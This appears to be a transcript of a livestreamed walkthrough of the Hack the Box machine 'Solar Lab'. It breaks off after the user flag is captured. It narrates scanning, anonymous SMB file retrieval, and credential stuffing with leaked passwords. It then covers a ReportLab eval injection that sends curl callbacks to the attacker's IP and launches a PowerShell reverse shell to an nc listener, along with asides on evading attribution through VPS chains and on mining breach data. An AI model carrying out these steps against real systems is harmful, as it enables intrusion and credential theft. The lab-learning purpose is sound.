right, welcome back to Savage Hack, Mr. Robot Monday. Finally starting on time here. I know the last few times have been just a little late there, but it is what it is. All right, so today I'm gonna pick out a random box from Hack the Box and just try to go through, uh, try and hack it. I mean, we'll see where we can go. I have a little bit more time today, so I'm actually gonna try one maybe a medium or a hard difficulty. Generally, I don't like to do those, especially with like the live streaming. If I'm uh, you know if I need a lot of time to do it, generally I don't have a lot of time in the afternoons. I have to take care of things around the house, stuff like that. So, but this evening I have time, so we're actually going to do one of these machines that's not an easy difficulty. So I'll go ahead and share my browser over here. I do have Hack the Box already pulled up. They have some seasonal ones, staff pick. I generally like to do the ones on the board here. As you can see, I've done most of the easy ones on this before. Uh, the easy ones sometimes they take a lot of time too. Like a lot of them can be a lot more difficult than what is actually registered as, right? So like I forget which one it was. I want to say I don't remember. Oh. So I had actually attempted C, but I actually got stuck. I actually haven't had time to finish that one, but it was a little bit more difficult than what I would assume an easy box would be. But I might actually do that on another, Mr. Robot Monday. Though I generally don't like to do ones that I've already attempted, because I already know where to go in some aspects. But I don't know, maybe this one because I didn't really get very far in it, but we'll save that one for another time. So we'll look at some of the medium ones. We got Blurry, Solar Lab, uh, Windows boxes too. Those are generally a bit more difficult than the Linux boxes. So uh, let's go ahead and shoot for Solar Lab. Then we can spin this one up. First things first, though, I do need to pull up my VPN. Go ahead and get connected to that. So we will CD into the desktop, where I have the open VPN file here, lab underscore defiance.ovpn. So we will go ahead and run sudo open right there and type in our super secret password. Cool. So as you can see here in the top right, we have our IP address connected to Hack the Box's network. So we have that lab access. It was also had the initialization sequence completed there as well. Cool. So moving right along, I'll go ahead and spawn this machine. I am using USVIP 1. I actually upgraded to VIP because the last time I was doing one of these, actually, I'm pretty sure I recorded. I got into the box, and then you just see other people in the box. You see all of their exploits that they had already run, all of their files that they had actually uploaded on the box. It was a very common thing, especially with like OSCP doing their labs. You would always see people inside of the machines that you hacked into. They would leave you little notes sometimes saying, "Hey, please leave this file here so I can use it later when I come back on the lab." Hilarious, hilarious stuff. But generally when I'm doing these, especially on a live stream, I don't really want anybody else on that machine because sometimes they can mess things up, right? So I ended up upgrading to the VIP VPN. So that means I get my own instance of the actual machine and I don't have to share it with a bunch of people. All right. So we'll let this load up and we'll grab that IP address once it spawns here, and then we can go ahead and get started. If you are showing up, please feel free to use the comments section. So I can see all comments from YouTube, Facebook, Instagram, uh, the website itself. If you're able to type in the chat there, I can see all of that in one place. So I can definitely highlight that, answer any questions that you all may have. So please feel free, and I'll actually even include that in the banner here. Go ahead and ask any questions that you may have. May need to adjust this real quick. There we go. Perfect. So yeah, just feel free. Any questions? No such thing as a dumb question. I'm learning here too, so it's not going to be just you guys learning. All right, so we have our IP address, so I will just copy that. That way I can close out this browser, or actually I'll just pull it out of the way, kind of off to the side there. And we'll go ahead and open Notepad. I will paste that IP address in there and we'll say target, right? Cool. So we'll just have that kind of saved there, just for quick reference and everything. All right. So first things first, I am going to run an Nmap scan. And if you see my other videos, Nmap is going to run a port scan to see what ports are open on this host. And then we will dive further and see what services are running on said ports. So go ahead and paste that IP address in there. What am I doing? We need to hit all ports. Sometimes this doesn't work as fast, but this is generally what I like to do just so I can see what ports are actually open. If this does take too long, I'll probably just run a normal Nmap scan where it'll do the top ports and we'll kind of go from there. All right, let's see. This may be taking a while. 7 minutes remaining. Okay, well, it's dropping. We'll give it a couple of minutes there. If it, like I said, if it takes too long, I'll just adjust and we'll kind of go from there. All right. Actually, while that's running, we'll just kind of read over. Where did that window go? There we go. We'll just see if they'll give us any tips or anything. Sometimes they do, sometimes they don't. Machine info, yeah, there's no info. It's just activity. So they do say, it's pretty medium, a bit hard and hard, just depending on. But for the most part, it's pretty medium. Yeah, sometimes they'll give you information in there, like machine info. They'll just tell you a little bit about the machine. The only information they're giving us is that they are saying it's a medium difficulty with a Windows machine. So anytime you're dealing with a Windows machine, I like dealing with the Linux machines. They're a little bit easier than the Windows, especially if you have like AMC and any kind of like antivirus EDR solution type thing on the end of it. It gets a little frustrating, especially when you're trying to gain persistence or gain that initial foothold, and AMC just keeps getting in the way, which I've shown on my blog site like a couple of times on how to bypass AMC. But that's one of those cat and mouse games where it's gonna constantly be updated. Cool. This is moving pretty fast. So we got 37 seconds left. And then with this, oh man, you know what? I messed up. Let me try something again. So I actually created a let me see txt. I actually created a script a little while ago that just automatically pulls all of the open ports from the scan. So what I did right here with the taco nmap.txt is I'm creating a file called nmap.txt, and the output of whatever the scan is going into that document or that file. And then from there, I'm going to run a script that I made that's going to grab all of the information I need and spit out a command so that all I have to do is copy and paste this command so that I can find all of the versions and run scans or scripts on these open ports. Just makes it a little bit easier, especially if there's like a lot of open ports, but sometimes there's not. Sometimes there's like two ports. So I'll let this run again. I mean, it was still going pretty fast. I mean, we had 37 seconds left. It was only, what, a couple minutes that it took? Now it seems to be going slow. uh, Nmap's one of those tools, like sometimes it'll zip through. It all depends on your connection, especially the connection with the VPN that we have here. If I were running this from like the cloud and I were on like or if I were scan for cloud because anyway. Uh, so if I were, cloud to cloud and they were like in the same server farm and everything like that, it would zip through this pretty quickly. You can also set your rate limits and everything on this. Not going to dive into that today, but you can because obviously something like this is going to be loud. If I were to run this on an actual website, The server owner, if they were monitoring their network and they would see all of this traffic, like there's no hiding this whatsoever this way. Even though there's a few tacks that like you could do like tac SS for like the quote unquote stealth mode. Still not stealthy, right? You would need to limit your packet rate. You would need to control the speed of that, and it would actually take quite some time. So if how do I dive into this without crossing any like morality lines, I guess. So a lot of attackers won't even use a direct, operating system. They'll upload their tools within a VPS, a virtual private server. That way, it's something that's already internet accessible. And then from there, they might use, other resources such as like an online nmap from like uh, what do you call it? From a URL, like an actual website that runs nmap scans, things of that sort. Not only to stay hidden, but to also make it a lot faster. So that way, if they do run something as quick as this, they're really not going to get caught because it's going to be bouncing from other places, and they're not really going to investigate unless they actually got, hit with like ransomware, or they actually got hit with an attack and got hacked. So they'll make note of where all of this traffic is coming from, but they may not fully investigate to find out its ultimate, originality. Because it would be a little bit difficult. You're having to go from a website like hosted somewhere that may not be interactive with, U.S. law. And then they would have to trace that back to the VPS, which could have been paid for with Bitcoin, which could be through another VPS, and it just keeps going and going and going. So it does make it a little bit difficult. All right, so we have what, 5 ports here open. Port 80. So there is a HTTP server running. So there's going to be a website there. We have 135, 139, 445. So we have SMB. Uh, 6791. I'm not sure what that is, but we'll go ahead and run our script. As you can see here, nmapscript.sh. Actually, I'll just nano that real quick and I'll kind of show you guys that script. So nano nmap script. Oh, there we go. Yep. So it essentially takes everything or nmap output file, echoes it into a file itself that I name, and I actually use that name within the command line there in the syntax. And then it prints out the nmap command so that I can scan all of the ports that were found, right? So it spits out nmap tac sv tac sc, and then tac p, and then it lists all of the ports that were open, and then it adds the IP address for me, right? So pretty simple script, but I like using it just because it saves me a little bit of time. So we will run that, and then boom. I mean, I could automate this just to run the command for me, but completely fine because some of the capture the flags that I like to do write ups on, I like to have the commands that I actually used. That way, other people can use them if they're running through that or having some kind of issue, right? So I just have it spit out the command so that I can run the command here. So we'll go ahead and run that. And while that's running, let me go ahead and fire up Firefox. And we'll go ahead and check out that website. So we will grab our IP address for the target, go to port 80. Okay, so I've been over this a few times. So it's showing up as solarlab.htb, and the reason that it's having this issue is because we need to manually configure the DNS for this, right? So if you're familiar with DNS, excuse me, domain name system. So there's DNS servers, and what they do is if you were to send a request from like or from your machine in your browser to say google.com, that request is actually going to go to a DNS server first. Well, first it's going to go through your cache to see if you've actually visited that website, but if you haven't, it's going to go over to a DNS server. The DNS server is going to look up that name, that domain name, google.com, and it's going to find the associated IP address and then send that back to your browser, and then your browser goes to that IP address. We don't we as humans don't really speak in IP. Or we don't speak in numbers, right? Like we speak in words. So it's easier to remember something like solarlab.htb rather than, our IP address every time we want to go to that site. Uh, since no domain server is going to have, this IP address and this because we're on their network for Hack the Box, we're going to have to manually add this so that we're kind of creating our own DNS for it, right? So we will go to sudo slash nano etc hosts, add this to our host file. Let's see. And we will grab that IP address, paste that in there, hit tab, and then we will add solarlab.htb. Write that to file, we'll exit out of there. Good with that terminal. So now that we essentially configured our own DNS, so to speak, by adding that to our hosts, we'll go ahead and refresh and a web page should appear. Oh, that's beautiful. The fact that it's working, not the colorful bubbles, is kind of weird, right? All right, so we'll let that load up, and we'll also check our Nmap scan here. So it is running Nginx. Let's see, did not follow redirect to solarlab.htb. Okay, that's fine. So we still have SM. Uh, we'll try that in a moment here if we can't find anything on this web page. Port 6791 does say HTTP, so there is an HTTP server running with Nginx. Did not see that with the original scan. The original scan just said HNM, which I was unsure of what that was. That's very odd that it's showing up that way. Did not follow redirect to report.solarlab.htb. So it looks like there is a subdomain called report. So let's go ahead and add that to our host list. Just like we added the domain of solarlab.htb, we will go ahead and add that subdomain as well. So we will sudo nano etc hosts, super secret password, and we will go ahead and tab over and type in report, if I can spell correctly, .solarlab.htb. Yeah, I don't think I need to add in. Yeah, we're good there. I don't have to add in the port. All right, close that, save it, and now we can exit out of that. All right, so we're not seeing anything crazy popping out on this other than the subdomain there, which that is useful information because generally with these things we'll have to brute force, and it does take some time, especially if you're using the wrong commands, right? Sometimes that really sucks. All right, so what I'm going to do is check out this website here. Let's see if we can find any kind of vulnerabilities or anything that looks crazy. Okay, solar page top, hashtag about, hashtag subscribe, contact. Okay, so this is all just on the same page. Get in touch. Let's just see what this does. Does it actually send it somewhere? Okay, but I don't know if that actually sent it somewhere. Let's look at the page source here. Scroll down to the bottom to where that was. Yeah, not seeing anything crazy there. And that's all good. Okay, so it may not be going anywhere. Completely fine. Let's see. Time until launch. What is solar time until launch. So we got a year until it launches. Oh, Solar Lab IM, instant messenger. So that's what it is. It's an instant messenger. So we have our CEO, Alexander Knight, and it looks like all this, yeah, all of the hyperlinks are just going back to the same page, completely fine. So it's just a basic page here. If I were an attacker, though, I'd be grabbing, this information here to hopefully, you know, obtain an account on there. Actually, you know what? We'll go ahead and do that. Why not? Practice like you play, right? So we have Alexander Knight, CEO. We have Claudia Springer. I wonder if she's related to Jerry. That was a dumb joke. Springer, she is a designer of what? Maybe the website? I don't know. And then we have Blake Byte. That's a funny name. Imagine having that name and being a hacker, man. You would never live that down. That'd be awesome. Developer. Okay. A jewel theme, jewel theme. So I'm not seeing anything crazy on this page here. So let me close this out and I will test out. Uh, let's do SMB. We'll just kind of go down the list here. So I need to pull up notes for SMB. I believe it's SMB client dash L, if I'm not mistaken. No pass. Yeah. Oh, sweet. Um, shit was our IP 10.10.11.16. Okay, so we do have access to their SMB server, and I do see a documents in there. Let's see if we can access that real quick. So, man, it's been a while since I've used SMB client, so I need to pull up my notes for SMB file transfers, maybe. Oh, let me go ahead and share what I'm looking at real quick. So this is my notes at Notion.so. I have all of my offensive notes in here for the different types of things that you can do. But I also have things that I can't show you, like my OSCP notes and lab notes and like all of that stuff. But highly recommend if you are trying to break into that career field of pen testing, a lifesaver for me. You can break things up into different areas. You can add in screenshots if you need be. But most importantly, I always add in code so that I can remember this, right? Because the last time that I used SMB client was probably on my OSCP exam, which was almost 2 years ago now. So I'm gonna forget all of this stuff. So we'll look at this. Let's see. Where would I have the SMB commands? Foothold, maybe? No. I figured it would be under file transfers. This may take me a moment. Because I may have it in a different area. Never said that my notes were actually, all together in like this neat order and stuff, but this does help. Uh, okay, I'm gonna have to look in my S or OSCP notes, which I cannot show on camera, otherwise I'll lose my cert. So let me go ahead and look into there. Actually, I think I know where it is too. I believe it's in the OSCP. Whatever. I'll just Google it, man. This is gonna take me a little bit. I could have swore I had it in file transfers though. That's very weird because generally, whenever I was like doing the pivoting and whatnot within the hosts within inside of the network, I would oftentimes open up an SCP or SMB server to transport files, do file transfer. So it's odd that it's not in there. I wonder if I accidentally deleted it, but whatever. Let's go ahead and look it up. So SMB client commands. And thank God for the internet too. Thank God for Google. Uh, I think Hacktrix has a good one. Yeah, there we go. Hacktrix. This is an awesome website because if you ever find an open port that you don't know exactly what service might be running on it, they'll give you things, right? So port 139445, everything you need to know about it, all the commands and stuff that you probably need to run to essentially test it. Obviously, we can't do enum for Linux because this is a Windows machine. Otherwise, with those ports open, I would definitely be running that. All right. Where is I need? We just do a search SMB client. Actually, what am I doing? I'm such an idiot. I already had it done here. I just need to add in the share. So we'll do the share. We'll do 2 slashes. And what is it? Documents. Maybe just 1 slash. Let's try that. What is going on here? Yeah, let me see if I can find that in my notes. I do apologize. It has been a while. But like I said, I mean, we're all learning together. I have to relearn some of the stuff. I know what I'm trying to do. It's just finding the commands to do it. Uh, like I said, sometimes you just come up short with that. It's completely fine, man. It literally happens to everybody. You're not gonna. There's just too much, stuff to remember every single command that you've ever done. You'll remember a lot of things for the most part, but oh, okay. So let's see. SMB client dash in. Apparently, I finally found it in my notes. It is in my OSCP section, by the way. So in, and then we'll try. What was our IP? 10, 10, 11, 16, and then our documents. There we go. So now we can show the directory of what's in there. Cool. All right. So we have concepts, desktop, INI, details file. What's that details file? Get details file dot xlsx. Oops. So whenever we type this, we're just getting that file onto our local machine. So we just downloaded it. So now it should be on our local machine. I'll open up another window just to kind of verify that. And ls, what was it called? Details file? Right there, details file. We just downloaded it. All right, so now let's get old leave request form.docx. Download that too. And let's just look around at some of the other stuff in here. So see concepts. Actually, can I just list the mm, training request form? We'll just go ahead and get everything that we can, right? Oh, I spelled it wrong. Training, not training. Cool. And we will get the travel request sample.docx. And this is why, like, if if you're gonna use an SMB server, especially for any kind of uh, internal, file share, anything like that, you definitely want this to be locked down. Back in the day, the NSA actually developed a tool or an exploit called Eternal Blue. If you haven't heard about it, essentially just hack into any Windows machine that they wanted to within a matter of seconds. End user didn't have to click on anything, but they ended up using SMB to essentially run that exploit. They came out with it years later. Once I forget what the Shadow Files or Shadow something, whatever their group was. They ended up releasing the tool, and it kind of came back on the NSA. It was kind of funny, but anyway, all right. So let's see what we got here. We'll go back. What other directories do we have? I'll just go ahead and peek in. Access denied. That's fine. We will CD into my pictures. I just like to take a look just in case, because sometimes people put random things in random folders, right? My videos. Videos. Yeah, nothing there too. Completely fine. Okay. Well, it looks like that's all that we can get from there. So I'll go ahead and exit, and let's take a peek at some of these files here. So what do we have first? Details file. Let's go ahead and open that. Archive not supported. I didn't mean to open it with that. Let's open with another application. I'm drawing a blank on what it's called. Uh, Man, it's been a while. Linux has its own version of like Microsoft Office. I just can't for the life of me remember the name of what it's called. As soon as I see it, I'll recognize it, but I need to pull that up. Man, gonna have to Google that too. Oh, I guess Instagram stopped live streaming for some reason. Maybe it's still going. That's weird. It just gave me some kind of warning symbol, whatever. All right. Let's see. Linux based Office Suite. What is it called? Open Office. That's what it's called. All right. Let me see. Libre. That's what I was looking for. LibreOffice. Whoops. Office. Nope. Looks like I don't have it. So let's see if we can download it real quick. Just pulling off a simple command here from Google so that I can download it. We'll continue. That's funny that I don't have it on here. I had to get a whole new instance. Actually, I got a whole new computer recently. So a lot of the stuff that I had on there wasn't there because I didn't transfer over the VM file, which is fine. I mean, it's good to start from scratch from time to time because it makes you remember what you had what you don't have, right? So something basic like this, so that I can view this file, right? What other files were there? Old leave request. Yeah, it just keeps trying to open in there. So I definitely need that Office. I might be able to open this with like a text editor though. Try it with mousepad. Oh no. Yeah, I guess we'll wait for this to install. Sorry about that. It's taking even more time. Well, we are making good progress though, right? Like we've already found something that was available to us, that was not, password protected or anything. We were able to get actually four files because there were some inside of here too. What were those called? Training request form, and then the other was a travel request. There we go. So now we can do this. That's awesome. Okay. So let me try and open that again. Details file. There we go. Oh wow. Okay. Password file. Alexander's social security number. Claudius. Wow. Yeah, you don't want this stuff being exposed. Blake's. Hey, wait. I remember those names actually. Alexander, Claudia, and Blake. So the CEO's social security number is on just some random Excel file along with one of the designers and the developer, right? That's crazy. Let's definitely not do that. I mean, obviously, this is all fake, but I'm sure that this was probably based on a real world uh, scenario. A lot of the times, these things are. So, definitely, if you ever have any PII, you don't want that just left alone on a random file. All right. Sites, Amazon, Chase, Fidelity, Cigna, Comcast, username. So they have email addresses here. Go ahead and copy all of that, right? Usernames. And we'll paste that in our file. So this is just a repeat. Blake.byte, Claudia S, Alexander K, K Alexander, and then okay. And then we have passwords here. So it looks like passwords to the different sites, maybe, but if they reuse their passwords, mother's maiden name. So these are our security questions, email. I'm just gonna copy all of that too, right? So if I were doing, an actual pen test on this, I'd be using a different tool. One that is included within the software here is called Cherry Tree. It acts a lot like how the thing I just showed you, Notion.so is. The only issue is I wouldn't want to store anything like this on Notion.so just in case it ever got hacked. I would want to store it locally. I wouldn't be doing it normally like this, but for capture the bot or capture the flag, purposes, I'll just use something quick and easy like this because it's not going to have like a shit ton of information for me. Uh, anyway, sheet two, sheet three, nothing. No. Anything else on here? Pertinent information. Okay. So it looks like we have usernames and passwords, which that's a really good thing, right? Cool. So I'll close that. We'll check out some of these other files. The old leave request form. I need to open with nope. There we go. Open with Office Writer. Holiday request form. Nothing really crazy in here. Just looks like a basic form that a company, I guess, filled out. Okay. What else were they called? Travel request and training request. Woodgroup.com. I don't know what that is, but huh. Okay. Whole lot of nothing. All right. Was that all of the files? Two right there. Yeah. So that was it. All right. So we got username and passwords now. We just don't know where to use them, or if they're even good, right? If these employees, actually, the CEO and everybody, if these people here don't use passwords over and over again, say they use a password manager, then good on them because we're not going to find a way in using these passwords. But human nature, generally, we always use the same password for everything, right? No, definitely use a password manager. That'll save you from things like this. Especially with all the breaches that have occurred, I can go online and find out your past what, like 50 used passwords, if even if you have that many. I could find that in an instance just based off of your email address. All I would have to do is type in your email address, look up those breaches that occurred, and then it's just going to list for me all of your passwords that you've ever used that have been in those breaches, right? So you definitely want to update your passwords. If I were out to target somebody specifically, that would be the easiest way to do that. Is by going and looking at those breaches, which I could probably look up that information probably within, I don't know, 4 or 5 minutes. Like, it wouldn't take me very long at all. And then from there, if you're using alternations of passwords, right? So you're using, like, say, you've always used password one, you got hit by a breach, so you're doing password two exclamation point. I can find that out pretty quickly as well, especially if I see a pattern there. I could essentially just brute force, not even necessarily brute force, but I could craft a word list that's gonna essentially add on characters at the end, the beginning, the middle, however that pattern is that I see from the past breaches, and I can guarantee I can get into your accounts. Scary, scary stuff. So you definitely want to change it up all the time, especially with these breaches that occur. Pay attention to that. Your phone, your phone will even tell you. Your phone will tell you if your password has been compromised in one of those breaches. Definitely listen to it. Take its advice and change that password. Can't harp on that enough. That's generally how people get owned. Uh, anyway, so back to the topic. So we don't know where to sign in with, but we do have usernames, right? Uh, let's actually go back to our Nmap scan there. My dog is barking. So we checked out the Nginx server on port 80. Wasn't really anything there. I didn't see a login. I could try directory brute forcing, fuzzing, but I did also see this HTTP, this subdomain here that we added to our Etsy host file. So let's go ahead and try that first because maybe there is a login here. Lab.htb, and this is going to be port 6791. It's like magic. It's like it wanted me to sign into this thing, right? That is awesome. All right, so we do have a login here for Report Hub. I don't know what Report Hub is. I don't know if that's a CMS of some sort or it's just some random web page. Anyway, all right. So we can do this a number of ways. Let's see. So I'll fire up Burp Suite, and we will use Burp Suite to see if we can use credential stuffing. And what credential stuffing is We have our usernames, right, that were demonstrated or they're shown within that document. We also have passwords that were shown. So we're just going to use these usernames and passwords to essentially try to get in. And that's what credential stuffing essentially is, right? So like I was telling you, how I could just go to one of those breaches, grab your credentials, your password, and all that. If you still use that same password on other sites, credential stuffing would be me using your login name as well as that password that I found to get into whatever other sites I could find. It helps with like lockouts and things of that sort because if I were gonna do a brute force attack using a dictionary or a word list of some sort that would just be crazy long, it could lock out your accounts if there's like so many times you can't sign in incorrectly before lockout. This helps to avoid that because there's not that many combinations of this. So, and actually, if I'm not mistaken, that was all lined up, right? So let's go back to that folder or that file. Yeah, so these are actually all aligned. So that makes our job even easier, right? And there's no, what was it called? Something hub, repo hub, or report hub? Report hub. No, okay. But the username, pass. So we can just try these username as passwords. Hell, we don't even need Burp Suite for that. But I'll go ahead and fire it up anyway. Next, start Burp. I'll need to configure uh proxy, whatever it's called. So we will go to options, proxies, add. We'll call this one Burp. We'll add in our internal IP address of 127.0.0.1, and we will do ports 80 for Burp Suite, HTTP, perfect, save. Okay, we'll go ahead and add that proxy in there. And let's make sure this is working right. So we'll do a test one first. Test, test. Oh wait, I didn't turn intercept on. Let's try that again. Test, test. There we go. So it is intercepting all of our traffic now. So we can see here, we can actually just run these, send this to repeater, and just change the username and password for what they have within this, right? So we can try, and you can also automate this using Intruder, running the sniper attack, but sometimes I like to do things manually, and that's just me. It is what it is. It just gives me more exposure to what I'm actually doing rather than automating everything, right? So we will go ahead and copy this password, see what kind of response this gives us. And we'll go ahead and send. 200, okay. Login report hub. User not found. Okay, so the user is not found. So that user is not going to be in there. Completely fine. So let's go to the next one. Let's do K Alexander. So I won't be able to use this one either because that user was not found. Go back to Burp Suite here. We'll try this user, K Alexander, and use their password. And let's see what kind of response we get from this. We'll go ahead and send that. So it still says login, so I think there's an error here. So user not found. Okay, so that's 2 users not found, 3 users not found. Blake.byte. And what was his password? This can be typed easily. So copy, go back to burp, and we'll send that. Same thing, same thing. User not found. Okay, do we have any users? So there's a K Alexander, there's an Alexander K. Let's try that. Alexander K. And then back to that file. Let's grab this password here. And let's send this. Log in, so I guess it didn't log in. Okay, that's different. User authentication error. So this is a user then. So Alexander K. And let's grab this password. It's a bunch of gibberish. Let's see if this lets us in. Login report hub. Okay, so that said the same thing. User authentication error. So these are 2 known uh usernames. So that's, let me make note of that actually. So that's known username. So maybe we can brute force? I don't know. I try to avoid brute forcing just because it's so time consuming sometimes, and like sometimes with these CTFs, it's not really meant for that, and you don't really get anywhere. All right, so this was not a username. This was not a username, even though it was backwards, right? K Alexander and Alexander K. So I'm wondering if Blake, what would Blake's be? Blake B? Because they have one for Alexander, they have one for Claudia, but why doesn't Blake have one? Let's try one for Blake and see if he uses the same password. So we'll try Blake B and grab his password. This can be typed easily. And let's send that. Oh wow, okay, so it's redirecting us. The 302, so yeah, we're in. We have our cookie and everything. So that actually works. So let me copy this password again. Oh, I think I already copied it anyway. Let me go ahead and turn off this proxy here. So we'll go ahead and type in, actually, let me stop and refresh. Resend, that's fine. Okay. So Blake B, paste in that password. Hey, we're in. That's awesome. Cool, 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 cool. Yeah, I was wondering why there was 2 that were correct. None of the others were, but Blake was the only one missing. That's crazy already. Oh, let's see here. I can close all of this. I don't need that anymore. Turn off the interceptor for now. We'll just keep burp open just in case we need it, uh, instead of having to wait to boot it all back up. All right, so where are we? Report Hub. Report Hub is the employee portal prioritizing seamless and secure communication, optimizes the processes for leave, training, home office, and travel requests, emphasizing robust security measures. Okay. So it's kind of like a workday or something, right? Training. So let's try a leave request. Does. Oh, somebody was pinging me. All right. Leave request. We'll do that's today, isn't it? Yeah. So we'll do today to tomorrow. Our phone number is 555-5555. Justification. I'm owed PTO. Upload signature, huh? I may have to. So it's an image file. Let me see if I can create a test file real quick. And so we will touch test.txt and nano. Actually, I should have just done that. Nano test txt. Okay, so it's already in there. We'll just put the word test in. Cool. Let's see if we can upload that. I don't need desktop, I need home. Oh, I actually, whatever. Image files, I need all files. Where's that test.txt? Open, generate PDF, huh? Must match. Please enter a 10-digit. Oh. Okay, I don't know what happened there. So Blake B, did I break it? Or do I have to do this every time? No, I guess I broke it. Please sign your report. So I have to try a shell. Oh, come on. Resets every time. Internal server error. Yeah, I definitely just broke it. All right, well, let me go back. Training request from tomorrow to Wednesday. Cybersecurity awareness sounds good. Why does it make me upload a signature? It's very weird to me. Everything has a signature. So I'm wondering if I can leverage that to upload something. Uh, let me just download. Was it JPEG picture? Images. We'll just grab a random JPEG here. We can save image as. Untitled works. All right, so let's see if we can get this thing to generate and to see kind of what it's doing though. So I'm a little confused. Those downloads, untitled, open. Okay, so it actually created something. So created. This is a PDF. There's our picture. This is interesting. It wouldn't let me upload the web shell, PHP web shell as a JPEG. So I'm wondering, let me actually back up real quick. Report Hub. Let's see if we can find anything on Report Hub. Report Hub exploits. Report Lab. What is that? Report Hub reporting web app. Is Report Lab the same thing? Because we have Solar Labs, but Report Hub. Let's take a peek. Let's see here. Open source project that allows the creation of documents in Adobe's portable document format PDF using. So I wonder if this is the same thing. Have any pictures of it? Because we do generate the PDF. Let me see if there was anything noted about. Oops. Oh, come on. There we go. Let's see if there's anything noted about what is actually running here, like any of the processes. And let me open up Burp Suite for that actually, so I can capture that request and see what's going on here. So we will turn on Interceptor and generate the PDF. Whoa. So I'm not seeing anything about what's actually running. Hmm. I don't know. Let's take a look here. All right. So what is that? This. I'm just really curious because I typed in report hub and report lab shows up. So HTML to PDF processing, which is exactly what's going on there that I could tell. But I'm not 100% certain that it's the same thing. So we'll go ahead and read through this and might give it a try. If not, I'll just go back out and see what else we can find. Okay, so similar exploit leading to remote code execution via the color attribute of the HTML tags. The content in the attribute was directly evaluated as a Python expression using the eval function, thus leading to code execution. The safe eval, as described earlier, sanitizes the environment from all dangerous functions so that executing code has no access to dangerous tools. Okay, so that's how to fix it apparently up here. One of the many overridden built-in classes is called type. If this class is called with one argument, it returns the type of an object. However, in case it is called with three arguments, it returns a new type object. This is essentially a dynamic form of the class statement. In other words, it can allow the creation of a new class that inherits from another class. So the idea here is to create a new class called word that inherits from the str or string that is then passed to the custom get attribute or get attr. Yeah, it would bypass the checks and would allow the access to sensitive attributes like code for the custom get attribute in sandbox eval returns. Okay, blah blah blah. Hmm. The original exploit has suffered from multiple shortcomings that made it exploitable only on Python 3.10. To solve these issues, a new approach has been made to access the operating system, the OS, Python module. Okay, so it accesses the global built-ins. So the so it accesses global so that you can access the operating system. Please refer to the poc.py. So assume it's in this folder. Uh-oh, try again. Oh wait, I got Burp Suite on. Totally forgot. Disable. Try that again. There we go. There we go. poc.py. Let's check out this code. So it imports simple doc templates, imports paragraph, and imports bytes IO. Okay. So this will be the exploit down here. So that get attribute command. So we end up getting access to the globals, which gives us access to the OS, the operating system itself, to run whatever command. So in this case, TMP and then exploited. So that's going to create a uh, file folder within the temp folder called exploited. So if you have remote code execution from this, we should be able to enter in some kind of reverse shell or some kind of file to essentially run something that'll get us a reverse shell. So it passes it to the color evaluator. So let's see. So as you see here, the font color is going to equal our commands here. So it's going to, that's pretty crazy that they found that out. So essentially this is what we're adding to that request is going to be a font color, and the font color is going to be that entire payload, uh, which we can actually adjust the payload to do certain things that we want. So let me go ahead and copy this. We might have to touch this up a little bit. And I don't even, like I said, I don't know if it's going to work, but we'll try it out because this is how you do things, right? You test them out. So I would actually want to run a command such as who am I or ID, but I'm going to do who am I. All right, now we need to go back. Let's see, Lake B. And what was this password? This can be typed easily. I don't know why that came up. That was weird. And we'll turn on burp again. Actually, let me disable burp real quick. Use one of these. Leave requests. Now we'll turn on burp. Intercept is on. Perfect. So do from tomorrow to Wednesday. Contact number. Bunch of fives. We will upload our pretty picture here. And then generate PDF. And I'm actually going to send this to Repeater so that I can see the responses that we get. Where should I put this? I'm wondering if wondering time interval. Let me see something real quick. Wonder if it matters where I put it. Oh wait, I need to copy the one that we wrote down. So I wonder if we can just put it in this first one here. Man, my phone is blowing up right now. Mhm. Oops. Oh no. I don't know where to put this in though. Like, so we have our file name. We don't need that. So we have our the time intervals kind of set already. So let me try putting it in here maybe. Wait, let me take that out. There we go. Now it's all reading. Don't need that. Who am I? So let me send that and let's see what happens. Internal server error. Hmm. Let me see something real quick. I will turn off proxy, intercept. Nope, cancel. Wonder if it's in here that we need to include it. Ah, shit. Okay, well, 500 internal error anyway. I meant to send this to repeater. Why did it change like that? There we go. Send to repeater. So who am I isn't getting anything. Let me try see. Try curl. Let me set up a Python 3 tech m HTTP server port 80. No, 8080. Oh, that's already in use too. 8000. There we go. Let's try to curl HTTP 10 10 16 3 3 and then 8000. And let's see if that works. Mm, I have to just do this in proxy. Let me try it. What is it? Curl HTTP, because it seemed to have gone through that time. We didn't get a 500 error, so I guess the who am I command wasn't returning anything. But if we can reach out to our machine, then that means that we can send a reverse shell. Nope, nothing, huh? Oh, maybe it's because we're not logged in. Damn it, man. This is getting annoying. Just need to save his damn password in there. Let's try that again, though. Try this again. Generate PDF. Let's grab our payload stuff here. All I need to there. There we go. And for this, we will do curl HTTP 10 10 16 3 on port 8000 test.txt forward. Okay, yep, we're getting a hit. So we successfully got it to that. That's crazy that this thing works because I wasn't sure. I wasn't sure if this was the same thing, but apparently it is. Yeah, so this is why I kept deleting all of this out. This is actually part of Python code. All we needed was the HTML, so that we could edit that font color into our payload. Uh, that's crazy that it worked, though. We managed to reach out to ourselves. So now that we know that, we should be able to either download a reverse shell and execute it, or we might just hit a one-liner reverse shell to have it, reach back out to our machine. We'll probably do that. Let me go to revshells.com. Amazing, amazing website here. Oops, still got Foxy Proxy on, so it's going through burp. Amazing website, freaking awesome, especially if you're doing OSCP, things that require a lot of reverse shell generating. You just type in your IP, type in whatever port you want to use, and then from there you could select what kind of reverse shell you want. In this case, I'm going to look for PowerShell. So I'll do PowerShell 1, I guess. Well, let's see what. Mm, yeah, we'll do base 64 encoded. Oh shit, did not mean to do that. Whoops. Copy and paste your payload there, and it does it all for you. I mean, you can even copy and paste for your own listener. It's freaking awesome website. All right, let's see. So nc-nvlp 4444. Oops, 4444. There we go. So I'll set up that listener first, and then we will go to back to this. We have our interceptor on. Generate no, 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 no. Totally. I forgot to catch it. That's fine. I turned the Foxy proxy off again. That's why. Turn that back on. So now we have the intercept. And let's see if we can get a shell. Finally get in, what, almost an hour and a half later? This is ridiculous. This is why, like, the mediums and hards, man, they take a while. I'm not even sure that I'll be able to fully get done with this thing tonight, but we'll find out. All right, so we'll go here. Let's edit our command to include our payload. There we go. Copy. And we'll just replace this with that. Forward, and hopefully we get a shell. Oh, we got something here. Who am I? We're in, man. We have a reverse shell, finally. Holy shit. So user Blake, directory, documents app. Let's see. Let's see if we can get that flag. And then we will cat user.txt. Boom. We got our user flag finally. An hour and 26 minutes in. So let me grab that hack the box page. We'll pull this over, and just to verify that it is correct, submit, and boom. That was, I'd say that's medium, like, because they gave us the usernames and passwords to try at the beginning within the SMB server that 